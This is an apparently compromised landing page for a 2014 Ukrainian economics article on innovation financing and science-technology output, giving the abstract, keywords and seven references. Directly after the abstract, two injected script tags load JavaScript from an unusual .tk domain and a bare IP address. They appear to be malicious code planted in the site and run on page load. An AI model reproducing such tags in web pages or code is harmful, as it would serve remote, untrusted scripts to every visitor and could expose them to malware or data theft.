ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 65.012.12:338.434:330.341
Сторінка молодого науковця

Створення науково-технічної продукції та обсяги фінансування інноваційної діяльності в Україні / Задорожна Л. М. // Економіка АПК. - 2014. - № 3 - С. 119

Проаналізовано динаміку створення науково-технічної продукції, обсяги, динаміку і структуру фінансування інноваційної діяльності в Україні. Наведено темпи зростання/зменшення обсягів фінансування державного замовлення, визначено структуру загального обсягу витрат за напрямами інноваційної діяльності, розподіл витрат на здійснення останньої за її стратегічними пріоритетними напрямами у 2012 році. Здійснено розподіл видатків на середньострокові пріоритетні напрями інноваційної діяльності загальнодержавного рівня за стратегічним пріоритетом «Технологічне оновлення та розвиток агропромислового комплексу» у 2012 році. Запропоновано обґрунтовані напрями розвитку інноваційної діяльності. Табл.: 1. Рис.: 6. Бібліогр.: 7.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: динаміка, аналіз, науково-технічна продукція, інновація, інноваційна діяльність, витрати, обсяги фінансування, бюджетні кошти

Список використаних джерел

  1. Hall B. H. The Financing of Innovation / Bronwyn H. Hall // December 2005. – P. 28.
  2. Kubiš J. Policy Options and Instruments for Financing Innovation: A Practical Guide to Early-Stage Financing / Ján Kubiš // United Nations Economic Commission for Europe. – New York and Geneva. – 2009. – P. 62.
  3. Реалізація пріоритетних напрямів розвитку науки і техніки та одержані результати у 2012 р. Аналітична довідка. – К., 2013. – С. 54.
  4. Наука та інновації в Україні [Електронний ресурс]. – Режим доступу: http://www.ukrstat.gov.ua/.
  5. Лапко О. Проблеми інноваційної діяльності / О. Лапко // Економіка України. – 2009. − № 8. – С. 93–95.
  6. Принципи формування і механізми реалізації фінансової політики приватизованих підприємств: [моногр.] ; за наук. ред. д-ра екон. наук, проф. М. А. Козоріз // Інститут регіональних досліджень НАН України. – Львів: ЛБІ НБУ, 2004. – 358 с.
  7. Терещенко О. О. Фінансова діяльність суб’єктів господарювання: [навч. посіб]. / О. О. Терещенко. – К.: КНЕУ, 2003. – 554 с.
Читати статтю: 14_03_119-126.pdf